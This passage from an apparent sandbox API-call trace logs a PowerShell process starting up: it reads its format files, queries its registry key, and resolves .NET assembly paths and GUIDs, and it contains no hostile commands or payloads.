lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.713] GetLastError () returned 0x0 [0052.713] SetErrorMode (uMode=0x1) returned 0x1 [0052.714] GetFileType (hFile=0x2f8) returned 0x1 [0052.714] SetErrorMode (uMode=0x1) returned 0x1 [0052.714] GetFileType (hFile=0x2f8) returned 0x1 [0052.714] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.715] GetLastError () returned 0x0 [0052.715] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.716] GetLastError () returned 0x0 [0052.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.716] GetLastError () returned 0x0 [0052.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, 
nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.716] GetLastError () returned 0x0 [0052.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.716] GetLastError () returned 0x0 [0052.716] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0xaca, lpOverlapped=0x0) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x239337a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x239337a*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] ReadFile (in: hFile=0x2f8, lpBuffer=0x2393d10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2393d10*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.717] GetLastError () returned 0x0 [0052.717] SetErrorMode (uMode=0x1) returned 0x1 [0052.717] GetFileAttributesExW (in: 
lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23b4d0c | out: lpFileInformation=0x23b4d0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0052.717] GetLastError () returned 0x0 [0052.717] SetErrorMode (uMode=0x1) returned 0x1 [0052.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.717] GetLastError () returned 0x0 [0052.717] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.717] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.717] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.717] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.718] GetLastError () returned 0x0 [0052.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.718] GetLastError () returned 0x0 [0052.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0052.719] GetLastError () returned 0x0 [0052.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0052.720] GetLastError () returned 0x57 [0052.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0052.727] GetLastError () returned 0x57 [0052.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", 
lpFilePart=0x0) returned 0x74 [0052.733] GetLastError () returned 0x57 [0052.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0052.739] GetLastError () returned 0x57 [0052.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0052.742] GetLastError () returned 0x57 [0052.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0052.744] GetLastError () returned 0x57 [0052.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0052.745] GetLastError () returned 0x57 [0052.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, 
lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0052.746] GetLastError () returned 0x57 [0052.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0052.748] GetLastError () returned 0x57 [0052.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0052.749] GetLastError () returned 0x57 [0052.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0052.750] GetLastError () returned 0x57 [0052.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0052.751] GetLastError () returned 0x57 [0052.752] 
GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0052.752] GetLastError () returned 0x57 [0052.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0052.760] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.761] GetLastError () returned 0x57 [0052.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.761] GetLastError () returned 0x57 [0052.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e1c0, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.762] GetLastError () returned 0x57 [0052.808] VirtualQuery (in: lpAddress=0x14d6c0, lpBuffer=0x14e6c0, dwLength=0x1c | out: lpBuffer=0x14e6c0*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.810] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd286b4dd, Data2=0x6f55, Data3=0x428e, Data4=([0]=0x8b, [1]=0x94, [2]=0xb5, [3]=0x2a, [4]=0xe8, [5]=0x60, [6]=0x6a, [7]=0x39))) returned 0x0 [0052.810] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe84d095c, Data2=0x2590, Data3=0x415a, Data4=([0]=0xb4, [1]=0x34, [2]=0xcd, [3]=0xb0, [4]=0xe9, [5]=0x83, [6]=0x16, [7]=0x1c))) returned 0x0 [0052.811] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.811] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.811] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd76502e5, Data2=0xa3a9, Data3=0x4602, Data4=([0]=0xb5, [1]=0x21, [2]=0x79, [3]=0x40, [4]=0x4d, [5]=0xc8, [6]=0x47, [7]=0xcf))) returned 0x0 [0052.812] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7bdc91de, Data2=0xed2c, Data3=0x45a7, Data4=([0]=0xa4, [1]=0x5a, [2]=0xa0, [3]=0xdf, [4]=0xa2, [5]=0xc7, [6]=0xda, [7]=0x62))) returned 0x0 [0052.812] VirtualQuery (in: lpAddress=0x14d864, lpBuffer=0x14e864, dwLength=0x1c | out: lpBuffer=0x14e864*(BaseAddress=0x14d000, AllocationBase=0x110000, 
AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.812] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.812] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.813] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6c4281a6, Data2=0x9a79, Data3=0x4e05, Data4=([0]=0x89, [1]=0xf9, [2]=0x98, [3]=0xb1, [4]=0x6c, [5]=0x82, [6]=0x95, [7]=0xd0))) returned 0x0 [0052.813] VirtualQuery (in: lpAddress=0x14d864, lpBuffer=0x14e864, dwLength=0x1c | out: lpBuffer=0x14e864*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.813] VirtualQuery (in: lpAddress=0x14d77c, lpBuffer=0x14e77c, dwLength=0x1c | out: lpBuffer=0x14e77c*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.814] VirtualQuery (in: lpAddress=0x14d430, lpBuffer=0x14e430, dwLength=0x1c | out: lpBuffer=0x14e430*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.814] VirtualQuery (in: lpAddress=0x14d430, lpBuffer=0x14e430, dwLength=0x1c | out: lpBuffer=0x14e430*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.814] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9e963ec, Data2=0x8f21, Data3=0x46ee, Data4=([0]=0x93, [1]=0xaa, [2]=0x93, [3]=0x92, [4]=0xcb, 
[5]=0x2f, [6]=0x70, [7]=0xac))) returned 0x0 [0052.814] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x5440d795, Data2=0xb53e, Data3=0x4b9b, Data4=([0]=0xa2, [1]=0x3a, [2]=0x16, [3]=0xa8, [4]=0xf2, [5]=0xbe, [6]=0x1e, [7]=0xd9))) returned 0x0 [0052.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0052.814] GetLastError () returned 0x57 [0052.814] SetErrorMode (uMode=0x1) returned 0x1 [0052.814] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.814] GetLastError () returned 0x0 [0052.814] GetFileType (hFile=0x2f8) returned 0x1 [0052.814] SetErrorMode (uMode=0x1) returned 0x1 [0052.815] GetFileType (hFile=0x2f8) returned 0x1 [0052.815] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.817] GetLastError () returned 0x0 [0052.817] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.817] GetLastError () returned 0x0 [0052.817] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () 
returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.818] GetLastError () returned 0x0 [0052.818] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.819] GetLastError () returned 0x0 [0052.819] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.819] GetLastError () returned 0x0 [0052.819] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.819] GetLastError () returned 0x0 [0052.819] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.819] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.820] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x2419dd4*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.820] GetLastError () returned 0x0 [0052.822] ReadFile (in: hFile=0x2f8, lpBuffer=0x2419dd4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, 